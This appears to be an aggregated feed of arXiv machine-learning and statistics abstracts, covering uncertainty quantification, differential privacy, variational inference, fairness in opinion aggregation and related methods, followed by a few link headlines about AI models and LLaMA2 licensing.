    There is a significant need for principled uncertainty reasoning in machine learning systems as they are increasingly deployed in safety-critical domains. A new approach with uncertainty-aware regression-based neural networks (NNs), based on learning evidential distributions for aleatoric and epistemic uncertainties, shows promise over traditional deterministic methods and typical Bayesian NNs, notably with the capabilities to disentangle aleatoric and epistemic uncertainties. Despite some empirical success of Deep Evidential Regression (DER), there are important gaps in the mathematical foundation that raise the question of why the proposed technique seemingly works. We detail the theoretical shortcomings and analyze the performance on synthetic and real-world data sets, showing that Deep Evidential Regression is a heuristic rather than an exact uncertainty quantification. We go on to discuss corrections and redefinitions of how aleatoric and epistemic uncertainties should be extracted from NNs.
    Pre-trained Perceptual Features Improve Differentially Private Image Generation. (arXiv:2205.12900v4 [stat.ML] UPDATED)
    Training even moderately-sized generative models with differentially-private stochastic gradient descent (DP-SGD) is difficult: the required level of noise for reasonable levels of privacy is simply too large. We advocate instead building off a good, relevant representation on an informative public dataset, then learning to model the private data with that representation. In particular, we minimize the maximum mean discrepancy (MMD) between private target data and a generator's distribution, using a kernel based on perceptual features learned from a public dataset. With the MMD, we can simply privatize the data-dependent term once and for all, rather than introducing noise at each step of optimization as in DP-SGD. Our algorithm allows us to generate CIFAR10-level images with $\epsilon \approx 2$ which capture distinctive features in the distribution, far surpassing the current state of the art, which mostly focuses on datasets such as MNIST and FashionMNIST at a large $\epsilon \approx 10$. Our work introduces simple yet powerful foundations for reducing the gap between private and non-private deep generative models. Our code is available at \url{https://github.com/ParkLabML/DP-MEPF}.
    Analyzing sports commentary in order to automatically recognize events and extract insights. (arXiv:2307.10303v1 [cs.CL])
    In this paper, we carefully investigate how we can use multiple different Natural Language Processing techniques and methods in order to automatically recognize the main actions in sports events. We aim to extract insights by analyzing live sport commentaries from different sources and by classifying these major actions into different categories. We also study if sentiment analysis could help detect these main actions.
    Mitigating Voter Attribute Bias for Fair Opinion Aggregation. (arXiv:2307.10749v1 [cs.HC])
    The aggregation of multiple opinions plays a crucial role in decision-making, such as in hiring and loan review, and in labeling data for supervised learning. Although majority voting and existing opinion aggregation models are effective for simple tasks, they are inappropriate for tasks without objectively true labels in which disagreements may occur. In particular, when voter attributes such as gender or race introduce bias into opinions, the aggregation results may vary depending on the composition of voter attributes. A balanced group of voters is desirable for fair aggregation results but may be difficult to prepare. In this study, we consider methods to achieve fair opinion aggregation based on voter attributes and evaluate the fairness of the aggregated results. To this end, we consider an approach that combines opinion aggregation models such as majority voting and the Dawid and Skene model (D&S model) with fairness options such as sample weighting. To evaluate the fairness of opinion aggregation, probabilistic soft labels are preferred over discrete class labels. First, we address the problem of soft label estimation without considering voter attributes and identify some issues with the D&S model. To address these limitations, we propose a new Soft D&S model with improved accuracy in estimating soft labels. Moreover, we evaluated the fairness of an opinion aggregation model, including Soft D&S, in combination with different fairness options using synthetic and semi-synthetic data. The experimental results suggest that the combination of Soft D&S and data splitting as a fairness option is effective for dense data, whereas weighted majority voting is effective for sparse data. These findings should prove particularly valuable in supporting decision-making by human and machine-learning models with balanced opinion aggregation.
    Sharpness Minimization Algorithms Do Not Only Minimize Sharpness To Achieve Better Generalization. (arXiv:2307.11007v1 [cs.LG])
    Despite extensive studies, the underlying reason as to why overparameterized neural networks can generalize remains elusive. Existing theory shows that common stochastic optimizers prefer flatter minimizers of the training loss, and thus a natural potential explanation is that flatness implies generalization. This work critically examines this explanation. Through theoretical and empirical investigation, we identify the following three scenarios for two-layer ReLU networks: (1) flatness provably implies generalization; (2) there exist non-generalizing flattest models and sharpness minimization algorithms fail to generalize, and (3) perhaps most surprisingly, there exist non-generalizing flattest models, but sharpness minimization algorithms still generalize. Our results suggest that the relationship between sharpness and generalization subtly depends on the data distributions and the model architectures and sharpness minimization algorithms do not only minimize sharpness to achieve better generalization. This calls for the search for other explanations for the generalization of over-parameterized neural networks.
    Implicit Multidimensional Projection of Local Subspaces. (arXiv:2009.03259v2 [cs.LG] UPDATED)
    We propose a visualization method to understand the effect of multidimensional projection on local subspaces, using implicit function differentiation. Here, we understand the local subspace as the multidimensional local neighborhood of data points. Existing methods focus on the projection of multidimensional data points, and the neighborhood information is ignored. Our method is able to analyze the shape and directional information of the local subspace to gain more insights into the global structure of the data through the perception of local structures. Local subspaces are fitted by multidimensional ellipses that are spanned by basis vectors. An accurate and efficient vector transformation method is proposed based on analytical differentiation of multidimensional projections formulated as implicit functions. The results are visualized as glyphs and analyzed using a full set of specifically-designed interactions supported in our efficient web-based visualization tool. The usefulness of our method is demonstrated using various multi- and high-dimensional benchmark datasets. Our implicit differentiation vector transformation is evaluated through numerical comparisons; the overall method is evaluated through exploration examples and use cases.
    Sequential Predictive Two-Sample and Independence Testing. (arXiv:2305.00143v2 [stat.ML] UPDATED)
    We study the problems of sequential nonparametric two-sample and independence testing. Sequential tests process data online and allow using observed data to decide whether to stop and reject the null hypothesis or to collect more data, while maintaining type I error control. We build upon the principle of (nonparametric) testing by betting, where a gambler places bets on future observations and their wealth measures evidence against the null hypothesis. While recently developed kernel-based betting strategies often work well on simple distributions, selecting a suitable kernel for high-dimensional or structured data, such as images, is often nontrivial. To address this drawback, we design prediction-based betting strategies that rely on the following fact: if a sequentially updated predictor starts to consistently determine (a) which distribution an instance is drawn from, or (b) whether an instance is drawn from the joint distribution or the product of the marginal distributions (the latter produced by external randomization), it provides evidence against the two-sample or independence nulls respectively. We empirically demonstrate the superiority of our tests over kernel-based approaches under structured settings. Our tests can be applied beyond the case of independent and identically distributed data, remaining valid and powerful even when the data distribution drifts over time.
    Privacy Amplification via Importance Sampling. (arXiv:2307.10187v1 [cs.CR])
    We examine the privacy-enhancing properties of subsampling a data set via importance sampling as a pre-processing step for differentially private mechanisms. This extends the established privacy amplification by subsampling result to importance sampling where each data point is weighted by the reciprocal of its selection probability. The implications for privacy of weighting each point are not obvious. On the one hand, a lower selection probability leads to a stronger privacy amplification. On the other hand, the higher the weight, the stronger the influence of the point on the output of the mechanism in the event that the point does get selected. We provide a general result that quantifies the trade-off between these two effects. We show that heterogeneous sampling probabilities can lead to both stronger privacy and better utility than uniform subsampling while retaining the subsample size. In particular, we formulate and solve the problem of privacy-optimal sampling, that is, finding the importance weights that minimize the expected subset size subject to a given privacy budget. Empirically, we evaluate the privacy, efficiency, and accuracy of importance sampling-based privacy amplification on the example of k-means clustering.
    Amortized Variational Inference: When and Why?. (arXiv:2307.11018v1 [stat.ML])
    Amortized variational inference (A-VI) is a method for approximating the intractable posterior distributions that arise in probabilistic models. The defining feature of A-VI is that it learns a global inference function that maps each observation to its local latent variable's approximate posterior. This stands in contrast to the more classical factorized (or mean-field) variational inference (F-VI), which directly learns the parameters of the approximating distribution for each latent variable. In deep generative models, A-VI is used as a computational trick to speed up inference for local latent variables. In this paper, we study A-VI as a general alternative to F-VI for approximate posterior inference. A-VI cannot produce an approximation with a lower Kullback-Leibler divergence than F-VI's optimal solution, because the amortized family is a subset of the factorized family. Thus a central theoretical problem is to characterize when A-VI still attains F-VI's optimal solution. We derive conditions on both the model and the inference function under which A-VI can theoretically achieve F-VI's optimum. We show that for a broad class of hierarchical models, including deep generative models, it is possible to close the gap between A-VI and F-VI. Further, for an even broader class of models, we establish when and how to expand the domain of the inference function to make amortization a feasible strategy. Finally, we prove that for certain models -- including hidden Markov models and Gaussian processes -- A-VI cannot match F-VI's solution, no matter how expressive the inference function is. We also study A-VI empirically. On several examples, we corroborate our theoretical results and investigate the performance of A-VI when varying the complexity of the inference function. When the gap between A-VI and F-VI can be closed, we find that the required complexity of the function need not scale with the number of observations, and that A-VI often converges faster than F-VI.
    Provably Efficient UCB-type Algorithms For Learning Predictive State Representations. (arXiv:2307.00405v2 [cs.LG] UPDATED)
    The general sequential decision-making problem, which includes Markov decision processes (MDPs) and partially observable MDPs (POMDPs) as special cases, aims at maximizing a cumulative reward by making a sequence of decisions based on a history of observations and actions over time. Recent studies have shown that the sequential decision-making problem is statistically learnable if it admits a low-rank structure modeled by predictive state representations (PSRs). Despite these advancements, existing approaches typically involve oracles or steps that are not computationally efficient. On the other hand, the upper confidence bound (UCB) based approaches, which have served successfully as computationally efficient methods in bandits and MDPs, have not been investigated for more general PSRs, due to the difficulty of optimistic bonus design in these more challenging settings. This paper proposes the first known UCB-type approach for PSRs, featuring a novel bonus term that upper bounds the total variation distance between the estimated and true models. We further characterize the sample complexity bounds for our designed UCB-type algorithms for both online and offline PSRs. In contrast to existing approaches for PSRs, our UCB-type algorithms enjoy computational efficiency, last-iterate guaranteed near-optimal policy, and guaranteed model accuracy.
    Fisher-Rao distance and pullback SPD cone distances between multivariate normal distributions. (arXiv:2307.10644v1 [cs.LG])
    Data sets of multivariate normal distributions abound in many scientific areas like diffusion tensor imaging, structure tensor computer vision, radar signal processing, machine learning, just to name a few. In order to process those normal data sets for downstream tasks like filtering, classification or clustering, one needs to define proper notions of dissimilarities between normals and paths joining them. The Fisher-Rao distance defined as the Riemannian geodesic distance induced by the Fisher information metric is such a principled metric distance which however is not known in closed-form excepts for a few particular cases. In this work, we first report a fast and robust method to approximate arbitrarily finely the Fisher-Rao distance between multivariate normal distributions. Second, we introduce a class of distances based on diffeomorphic embeddings of the normal manifold into a submanifold of the higher-dimensional symmetric positive-definite cone corresponding to the manifold of centered normal distributions. We show that the projective Hilbert distance on the cone yields a metric on the embedded normal submanifold and we pullback that cone distance with its associated straight line Hilbert cone geodesics to obtain a distance and smooth paths between normal distributions. Compared to the Fisher-Rao distance approximation, the pullback Hilbert cone distance is computationally light since it requires to compute only the extreme minimal and maximal eigenvalues of matrices. Finally, we show how to use those distances in clustering tasks.
    Ensemble Learning based Anomaly Detection for IoT Cybersecurity via Bayesian Hyperparameters Sensitivity Analysis. (arXiv:2307.10596v1 [cs.LG])
    The Internet of Things (IoT) integrates more than billions of intelligent devices over the globe with the capability of communicating with other connected devices with little to no human intervention. IoT enables data aggregation and analysis on a large scale to improve life quality in many domains. In particular, data collected by IoT contain a tremendous amount of information for anomaly detection. The heterogeneous nature of IoT is both a challenge and an opportunity for cybersecurity. Traditional approaches in cybersecurity monitoring often require different kinds of data pre-processing and handling for various data types, which might be problematic for datasets that contain heterogeneous features. However, heterogeneous types of network devices can often capture a more diverse set of signals than a single type of device readings, which is particularly useful for anomaly detection. In this paper, we present a comprehensive study on using ensemble machine learning methods for enhancing IoT cybersecurity via anomaly detection. Rather than using one single machine learning model, ensemble learning combines the predictive power from multiple models, enhancing their predictive accuracy in heterogeneous datasets rather than using one single machine learning model. We propose a unified framework with ensemble learning that utilises Bayesian hyperparameter optimisation to adapt to a network environment that contains multiple IoT sensor readings. Experimentally, we illustrate their high predictive power when compared to traditional methods.
    Pythae: Unifying Generative Autoencoders in Python -- A Benchmarking Use Case. (arXiv:2206.08309v2 [cs.LG] UPDATED)
    In recent years, deep generative models have attracted increasing interest due to their capacity to model complex distributions. Among those models, variational autoencoders have gained popularity as they have proven both to be computationally efficient and yield impressive results in multiple fields. Following this breakthrough, extensive research has been done in order to improve the original publication, resulting in a variety of different VAE models in response to different tasks. In this paper we present Pythae, a versatile open-source Python library providing both a unified implementation and a dedicated framework allowing straightforward, reproducible and reliable use of generative autoencoder models. We then propose to use this library to perform a case study benchmark where we present and compare 19 generative autoencoder models representative of some of the main improvements on downstream tasks such as image reconstruction, generation, classification, clustering and interpolation. The open-source library can be found at https://github.com/clementchadebec/benchmark_VAE.
    Label Calibration for Semantic Segmentation Under Domain Shift. (arXiv:2307.10842v1 [cs.CV])
    Performance of a pre-trained semantic segmentation model is likely to substantially decrease on data from a new domain. We show a pre-trained model can be adapted to unlabelled target domain data by calculating soft-label prototypes under the domain shift and making predictions according to the prototype closest to the vector with predicted class probabilities. The proposed adaptation procedure is fast, comes almost for free in terms of computational resources and leads to considerable performance improvements. We demonstrate the benefits of such label calibration on the highly-practical synthetic-to-real semantic segmentation problem.
    A New Computationally Simple Approach for Implementing Neural Networks with Output Hard Constraints. (arXiv:2307.10459v1 [cs.LG])
    A new computationally simple method of imposing hard convex constraints on the neural network output values is proposed. The key idea behind the method is to map a vector of hidden parameters of the network to a point that is guaranteed to be inside the feasible set defined by a set of constraints. The mapping is implemented by the additional neural network layer with constraints for output. The proposed method is simply extended to the case when constraints are imposed not only on the output vectors, but also on joint constraints depending on inputs. The projection approach to imposing constraints on outputs can simply be implemented in the framework of the proposed method. It is shown how to incorporate different types of constraints into the proposed method, including linear and quadratic constraints, equality constraints, and dynamic constraints, constraints in the form of boundaries. An important feature of the method is its computational simplicity. Complexities of the forward pass of the proposed neural network layer by linear and quadratic constraints are O(n*m) and O(n^2*m), respectively, where n is the number of variables, m is the number of constraints. Numerical experiments illustrate the method by solving optimization and classification problems. The code implementing the method is publicly available.
    Multiply Robust Estimator Circumvents Hyperparameter Tuning of Neural Network Models in Causal Inference. (arXiv:2307.10536v1 [stat.ME])
    Estimation of the Average Treatment Effect (ATE) is often carried out in 2 steps, wherein the first step, the treatment and outcome are modeled, and in the second step the predictions are inserted into the ATE estimator. In the first steps, numerous models can be fit to the treatment and outcome, including using machine learning algorithms. However, it is a difficult task to choose among the hyperparameter sets which will result in the best causal effect estimation and inference. Multiply Robust (MR) estimator allows us to leverage all the first-step models in a single estimator. We show that MR estimator is $n^r$ consistent if one of the first-step treatment or outcome models is $n^r$ consistent. We also show that MR is the solution to a broad class of estimating equations, and is asymptotically normal if one of the treatment models is $\sqrt{n}$-consistent. The standard error of MR is also calculated which does not require a knowledge of the true models in the first step. Our simulations study supports the theoretical findings.
    Long-Tail Theory under Gaussian Mixtures. (arXiv:2307.10736v1 [cs.LG])
    We suggest a simple Gaussian mixture model for data generation that complies with Feldman's long tail theory (2020). We demonstrate that a linear classifier cannot decrease the generalization error below a certain level in the proposed model, whereas a nonlinear classifier with a memorization capacity can. This confirms that for long-tailed distributions, rare training examples must be considered for optimal generalization to new data. Finally, we show that the performance gap between linear and nonlinear models can be lessened as the tail becomes shorter in the subpopulation frequency distribution, as confirmed by experiments on synthetic and real data.  ( 2 min )
    Determination of the critical points for systems of directed percolation class using machine learning. (arXiv:2307.10456v1 [cond-mat.stat-mech])
    Recently, machine learning algorithms have been used remarkably to study the equilibrium phase transitions, however there are only a few works have been done using this technique in the nonequilibrium phase transitions. In this work, we use the supervised learning with the convolutional neural network (CNN) algorithm and unsupervised learning with the density-based spatial clustering of applications with noise (DBSCAN) algorithm to study the nonequilibrium phase transition in two models. We use CNN and DBSCAN in order to determine the critical points for directed bond percolation (bond DP) model and Domany-Kinzel cellular automaton (DK) model. Both models have been proven to have a nonequilibrium phase transition belongs to the directed percolation (DP) universality class. In the case of supervised learning we train CNN using the images which are generated from Monte Carlo simulations of directed bond percolation. We use that trained CNN in studding the phase transition for the two models. In the case of unsupervised learning, we train DBSCAN using the raw data of Monte Carlo simulations. In this case, we retrain DBSCAN at each time we change the model or lattice size. Our results from both algorithms show that, even for a very small values of lattice size, machine can predict the critical points accurately for both models. Finally, we mention to that, the value of the critical point we find here for bond DP model using CNN or DBSCAN is exactly the same value that has been found using transfer learning with a domain adversarial neural network (DANN) algorithm.
    Conditional expectation network for SHAP. (arXiv:2307.10654v1 [cs.LG])
    A very popular model-agnostic technique for explaining predictive models is the SHapley Additive exPlanation (SHAP). The two most popular versions of SHAP are a conditional expectation version and an unconditional expectation version (the latter is also known as interventional SHAP). Except for tree-based methods, usually the unconditional version is used (for computational reasons). We provide a (surrogate) neural network approach which allows us to efficiently calculate the conditional version for both neural networks and other regression models, and which properly considers the dependence structure in the feature components. This proposal is also useful to provide drop1 and anova analyses in complex regression models which are similar to their generalized linear model (GLM) counterparts, and we provide a partial dependence plot (PDP) counterpart that considers the right dependence structure in the feature components.
    Towards a Complete Analysis of Langevin Monte Carlo: Beyond Poincar\'e Inequality. (arXiv:2303.03589v2 [math.ST] UPDATED)
    Langevin diffusions are rapidly convergent under appropriate functional inequality assumptions. Hence, it is natural to expect that with additional smoothness conditions to handle the discretization errors, their discretizations like the Langevin Monte Carlo (LMC) converge in a similar fashion. This research program was initiated by Vempala and Wibisono (2019), who established results under log-Sobolev inequalities. Chewi et al. (2022) extended the results to handle the case of Poincar\'e inequalities. In this paper, we go beyond Poincar\'e inequalities, and push this research program to its limit. We do so by establishing upper and lower bounds for Langevin diffusions and LMC under weak Poincar\'e inequalities that are satisfied by a large class of densities including polynomially-decaying heavy-tailed densities (i.e., Cauchy-type). Our results explicitly quantify the effect of the initializer on the performance of the LMC algorithm. In particular, we show that as the tail goes from sub-Gaussian, to sub-exponential, and finally to Cauchy-like, the dependency on the initial error goes from being logarithmic, to polynomial, and then finally to being exponential. This three-step phase transition is in particular unavoidable as demonstrated by our lower bounds, clearly defining the boundaries of LMC.
    An IPW-based Unbiased Ranking Metric in Two-sided Markets. (arXiv:2307.10204v1 [cs.IR])
    In modern recommendation systems, unbiased learning-to-rank (LTR) is crucial for prioritizing items from biased implicit user feedback, such as click data. Several techniques, such as Inverse Propensity Weighting (IPW), have been proposed for single-sided markets. However, less attention has been paid to two-sided markets, such as job platforms or dating services, where successful conversions require matching preferences from both users. This paper addresses the complex interaction of biases between users in two-sided markets and proposes a tailored LTR approach. We first present a formulation of feedback mechanisms in two-sided matching platforms and point out that their implicit feedback may include position bias from both user groups. On the basis of this observation, we extend the IPW estimator and propose a new estimator, named two-sided IPW, to address the position bases in two-sided markets. We prove that the proposed estimator satisfies the unbiasedness for the ground-truth ranking metric. We conducted numerical experiments on real-world two-sided platforms and demonstrated the effectiveness of our proposed method in terms of both precision and robustness. Our experiments showed that our method outperformed baselines especially when handling rare items, which are less frequently observed in the training data.
    From Graph Generation to Graph Classification. (arXiv:2302.07989v2 [cs.LG] UPDATED)
    This note describes a new approach to classifying graphs that leverages graph generative models (GGM). Assuming a GGM that defines a joint probability distribution over graphs and their class labels, I derive classification formulas for the probability of a class label given a graph. A new conditional ELBO can be used to train a generative graph auto-encoder model for discrimination. While leveraging generative models for classification has been well explored for non-relational i.i.d. data, to our knowledge it is a novel approach to graph classification.  ( 2 min )
    Flow Map Learning for Unknown Dynamical Systems: Overview, Implementation, and Benchmarks. (arXiv:2307.11013v1 [cs.LG])
    Flow map learning (FML), in conjunction with deep neural networks (DNNs), has shown promises for data driven modeling of unknown dynamical systems. A remarkable feature of FML is that it is capable of producing accurate predictive models for partially observed systems, even when their exact mathematical models do not exist. In this paper, we present an overview of the FML framework, along with the important computational details for its successful implementation. We also present a set of well defined benchmark problems for learning unknown dynamical systems. All the numerical details of these problems are presented, along with their FML results, to ensure that the problems are accessible for cross-examination and the results are reproducible.  ( 2 min )
    A Matrix Ensemble Kalman Filter-based Multi-arm Neural Network to Adequately Approximate Deep Neural Networks. (arXiv:2307.10436v1 [stat.ML])
    Deep Learners (DLs) are the state-of-art predictive mechanism with applications in many fields requiring complex high dimensional data processing. Although conventional DLs get trained via gradient descent with back-propagation, Kalman Filter (KF)-based techniques that do not need gradient computation have been developed to approximate DLs. We propose a multi-arm extension of a KF-based DL approximator that can mimic DL when the sample size is too small to train a multi-arm DL. The proposed Matrix Ensemble Kalman Filter-based multi-arm ANN (MEnKF-ANN) also performs explicit model stacking that becomes relevant when the training sample has an unequal-size feature set. Our proposed technique can approximate Long Short-term Memory (LSTM) Networks and attach uncertainty to the predictions obtained from these LSTMs with desirable coverage. We demonstrate how MEnKF-ANN can "adequately" approximate an LSTM network trained to classify what carbohydrate substrates are digested and utilized by a microbiome sample whose genomic sequences consist of polysaccharide utilization loci (PULs) and their encoded genes.  ( 2 min )
    Feed-Forward Source-Free Domain Adaptation via Class Prototypes. (arXiv:2307.10787v1 [cs.CV])
    Source-free domain adaptation has become popular because of its practical usefulness and no need to access source data. However, the adaptation process still takes a considerable amount of time and is predominantly based on optimization that relies on back-propagation. In this work we present a simple feed-forward approach that challenges the need for back-propagation based adaptation. Our approach is based on computing prototypes of classes under the domain shift using a pre-trained model. It achieves strong improvements in accuracy compared to the pre-trained model and requires only a small fraction of time of existing domain adaptation methods.  ( 2 min )
    Addressing caveats of neural persistence with deep graph persistence. (arXiv:2307.10865v1 [cs.LG])
    Neural Persistence is a prominent measure for quantifying neural network complexity, proposed in the emerging field of topological data analysis in deep learning. In this work, however, we find both theoretically and empirically that the variance of network weights and spatial concentration of large weights are the main factors that impact neural persistence. Whilst this captures useful information for linear classifiers, we find that no relevant spatial structure is present in later layers of deep neural networks, making neural persistence roughly equivalent to the variance of weights. Additionally, the proposed averaging procedure across layers for deep neural networks does not consider interaction between layers. Based on our analysis, we propose an extension of the filtration underlying neural persistence to the whole neural network instead of single layers, which is equivalent to calculating neural persistence on one particular matrix. This yields our deep graph persistence measure, which implicitly incorporates persistent paths through the network and alleviates variance-related issues through standardisation. Code is available at https://github.com/ExplainableML/Deep-Graph-Persistence .  ( 2 min )
    Sequential Kernel Embedding for Mediated and Time-Varying Dose Response Curves. (arXiv:2111.03950v4 [stat.ME] UPDATED)
    We propose simple nonparametric estimators for mediated and time-varying dose response curves based on kernel ridge regression. By embedding Pearl's mediation formula and Robins' g-formula with kernels, we allow treatments, mediators, and covariates to be continuous in general spaces, and also allow for nonlinear treatment-confounder feedback. Our key innovation is a reproducing kernel Hilbert space technique called sequential kernel embedding, which we use to construct simple estimators for complex causal estimands. Our estimators preserve the generality of classic identification while also achieving nonasymptotic uniform rates. In nonlinear simulations with many covariates, we demonstrate strong performance. We estimate mediated and time-varying dose response curves of the US Job Corps, and clean data that may serve as a benchmark in future work. We extend our results to mediated and time-varying treatment effects and counterfactual distributions, verifying semiparametric efficiency and weak convergence.  ( 2 min )
    Cluster-aware Semi-supervised Learning: Relational Knowledge Distillation Provably Learns Clustering. (arXiv:2307.11030v1 [stat.ML])
    Despite the empirical success and practical significance of (relational) knowledge distillation that matches (the relations of) features between teacher and student models, the corresponding theoretical interpretations remain limited for various knowledge distillation paradigms. In this work, we take an initial step toward a theoretical understanding of relational knowledge distillation (RKD), with a focus on semi-supervised classification problems. We start by casting RKD as spectral clustering on a population-induced graph unveiled by a teacher model. Via a notion of clustering error that quantifies the discrepancy between the predicted and ground truth clusterings, we illustrate that RKD over the population provably leads to low clustering error. Moreover, we provide a sample complexity bound for RKD with limited unlabeled samples. For semi-supervised learning, we further demonstrate the label efficiency of RKD through a general framework of cluster-aware semi-supervised learning that assumes low clustering errors. Finally, by unifying data augmentation consistency regularization into this cluster-aware framework, we show that despite the common effect of learning accurate clusterings, RKD facilitates a "global" perspective through spectral clustering, whereas consistency regularization focuses on a "local" perspective via expansion.  ( 2 min )
    Improving Uncertainty Quantification of Variance Networks by Tree-Structured Learning. (arXiv:2212.12658v2 [cs.LG] UPDATED)
    To improve the uncertainty quantification of variance networks, we propose a novel tree-structured local neural network model that partitions the feature space into multiple regions based on uncertainty heterogeneity. A tree is built upon giving the training data, whose leaf nodes represent different regions where region-specific neural networks are trained to predict both the mean and the variance for quantifying uncertainty. The proposed Uncertainty-Splitting Neural Regression Tree (USNRT) employs novel splitting criteria. At each node, a neural network is trained on the full data first, and a statistical test for the residuals is conducted to find the best split, corresponding to the two sub-regions with the most significant uncertainty heterogeneity between them. USNRT is computationally friendly because very few leaf nodes are sufficient and pruning is unnecessary. Furthermore, an ensemble version can be easily constructed to estimate the total uncertainty including the aleatory and epistemic. On extensive UCI datasets, USNRT or its ensemble shows superior performance compared to some recent popular methods for quantifying uncertainty with variances. Through comprehensive visualization and analysis, we uncover how USNRT works and show its merits, revealing that uncertainty heterogeneity does exist in many datasets and can be learned by USNRT.  ( 2 min )
    Causality-oriented robustness: exploiting general additive interventions. (arXiv:2307.10299v1 [stat.ME])
    Since distribution shifts are common in real-world applications, there is a pressing need for developing prediction models that are robust against such shifts. Existing frameworks, such as empirical risk minimization or distributionally robust optimization, either lack generalizability for unseen distributions or rely on postulated distance measures. Alternatively, causality offers a data-driven and structural perspective to robust predictions. However, the assumptions necessary for causal inference can be overly stringent, and the robustness offered by such causal models often lacks flexibility. In this paper, we focus on causality-oriented robustness and propose Distributional Robustness via Invariant Gradients (DRIG), a method that exploits general additive interventions in training data for robust predictions against unseen interventions, and naturally interpolates between in-distribution prediction and causality. In a linear setting, we prove that DRIG yields predictions that are robust among a data-dependent class of distribution shifts. Furthermore, we show that our framework includes anchor regression (Rothenh\"ausler et al.\ 2021) as a special case, and that it yields prediction models that protect against more diverse perturbations. We extend our approach to the semi-supervised domain adaptation setting to further improve prediction performance. Finally, we empirically validate our methods on synthetic simulations and on single-cell data.  ( 2 min )
    Robust Principal Component Analysis: A Median of Means Approach. (arXiv:2102.03403v2 [stat.ML] UPDATED)
    Principal Component Analysis (PCA) is a fundamental tool for data visualization, denoising, and dimensionality reduction. It is widely popular in Statistics, Machine Learning, Computer Vision, and related fields. However, PCA is well-known to fall prey to outliers and often fails to detect the true underlying low-dimensional structure within the dataset. Following the Median of Means (MoM) philosophy, recent supervised learning methods have shown great success in dealing with outlying observations without much compromise to their large sample theoretical properties. This paper proposes a PCA procedure based on the MoM principle. Called the \textbf{M}edian of \textbf{M}eans \textbf{P}rincipal \textbf{C}omponent \textbf{A}nalysis (MoMPCA), the proposed method is not only computationally appealing but also achieves optimal convergence rates under minimal assumptions. In particular, we explore the non-asymptotic error bounds of the obtained solution via the aid of the Rademacher complexities while granting absolutely no assumption on the outlying observations. The derived concentration results are not dependent on the dimension because the analysis is conducted in a separable Hilbert space, and the results only depend on the fourth moment of the underlying distribution in the corresponding norm. The proposal's efficacy is also thoroughly showcased through simulations and real data applications.  ( 2 min )
    Representing Random Utility Choice Models with Neural Networks. (arXiv:2207.12877v2 [cs.LG] UPDATED)
    Motivated by the successes of deep learning, we propose a class of neural network-based discrete choice models, called RUMnets, inspired by the random utility maximization (RUM) framework. This model formulates the agents' random utility function using a sample average approximation. We show that RUMnets sharply approximate the class of RUM discrete choice models: any model derived from random utility maximization has choice probabilities that can be approximated arbitrarily closely by a RUMnet. Reciprocally, any RUMnet is consistent with the RUM principle. We derive an upper bound on the generalization error of RUMnets fitted on choice data, and gain theoretical insights on their ability to predict choices on new, unseen data depending on critical parameters of the dataset and architecture. By leveraging open-source libraries for neural networks, we find that RUMnets are competitive against several choice modeling and machine learning methods in terms of predictive accuracy on two real-world datasets.  ( 2 min )
    Tuning Stochastic Gradient Algorithms for Statistical Inference via Large-Sample Asymptotics. (arXiv:2207.12395v3 [stat.CO] UPDATED)
    The tuning of stochastic gradient algorithms (SGAs) for optimization and sampling is often based on heuristics and trial-and-error rather than generalizable theory. We address this theory--practice gap by characterizing the large-sample statistical asymptotics of SGAs via a joint step-size--sample-size scaling limit. We show that iterate averaging with a large fixed step size is robust to the choice of tuning parameters and asymptotically has covariance proportional to that of the MLE sampling distribution. We also prove a Bernstein--von Mises-like theorem to guide tuning, including for generalized posteriors that are robust to model misspecification. Numerical experiments validate our results and recommendations in realistic finite-sample regimes. Our work lays the foundation for a systematic analysis of other stochastic gradient Markov chain Monte Carlo algorithms for a wide range of models.  ( 2 min )
    A Bayesian Programming Approach to Car-following Model Calibration and Validation using Limited Data. (arXiv:2307.10437v1 [cs.LG])
    Traffic simulation software is used by transportation researchers and engineers to design and evaluate changes to roadways. These simulators are driven by models of microscopic driver behavior from which macroscopic measures like flow and congestion can be derived. Many models are designed for a subset of possible traffic scenarios and roadway configurations, while others have no explicit constraints on their application. Work zones (WZs) are one scenario for which no model to date has reproduced realistic driving behavior. This makes it difficult to optimize for safety and other metrics when designing a WZ. The Federal Highway Administration commissioned the USDOT Volpe Center to develop a car-following (CF) model for use in microscopic simulators that can capture and reproduce driver behavior accurately within and outside of WZs. Volpe also performed a naturalistic driving study to collect telematics data from vehicles driven on roads with WZs for use in model calibration. During model development, Volpe researchers observed difficulties in calibrating their model, leaving them to question whether there existed flaws in their model, in the data, or in the procedure used to calibrate the model using the data. In this thesis, I use Bayesian methods for data analysis and parameter estimation to explore and, where possible, address these questions. First, I use Bayesian inference to measure the sufficiency of the size of the data set. Second, I compare the procedure and results of the genetic algorithm based calibration performed by the Volpe researchers with those of Bayesian calibration. Third, I explore the benefits of modeling CF hierarchically. Finally, I apply what was learned in the first three phases using an established CF model, Wiedemann 99, to the probabilistic modeling of the Volpe model. Validation is performed using information criteria as an estimate of predictive accuracy.  ( 3 min )
    Properties of Discrete Sliced Wasserstein Losses. (arXiv:2307.10352v1 [stat.ML])
    The Sliced Wasserstein (SW) distance has become a popular alternative to the Wasserstein distance for comparing probability measures. Widespread applications include image processing, domain adaptation and generative modelling, where it is common to optimise some parameters in order to minimise SW, which serves as a loss function between discrete probability measures (since measures admitting densities are numerically unattainable). All these optimisation problems bear the same sub-problem, which is minimising the Sliced Wasserstein energy. In this paper we study the properties of $\mathcal{E}: Y \longmapsto \mathrm{SW}_2^2(\gamma_Y, \gamma_Z)$, i.e. the SW distance between two uniform discrete measures with the same amount of points as a function of the support $Y \in \mathbb{R}^{n \times d}$ of one of the measures. We investigate the regularity and optimisation properties of this energy, as well as its Monte-Carlo approximation $\mathcal{E}_p$ (estimating the expectation in SW using only $p$ samples) and show convergence results on the critical points of $\mathcal{E}_p$ to those of $\mathcal{E}$, as well as an almost-sure uniform convergence. Finally, we show that in a certain sense, Stochastic Gradient Descent methods minimising $\mathcal{E}$ and $\mathcal{E}_p$ converge towards (Clarke) critical points of these energies.  ( 2 min )

  • Open

    Computer chip with built-in human brain tissue gets military funding
    submitted by /u/nickb [link] [comments]  ( 8 min )
    Stability AI: Meet FreeWilly, Our Large And Mighty Instruction Fine-Tuned Models
    submitted by /u/nickb [link] [comments]  ( 8 min )
    LLaMA2 isn't "Open Source" - and why it doesn't matter
    submitted by /u/nickb [link] [comments]  ( 8 min )
  • Open

    [D] When will LLMs start being used in RL processes to train their rationality?
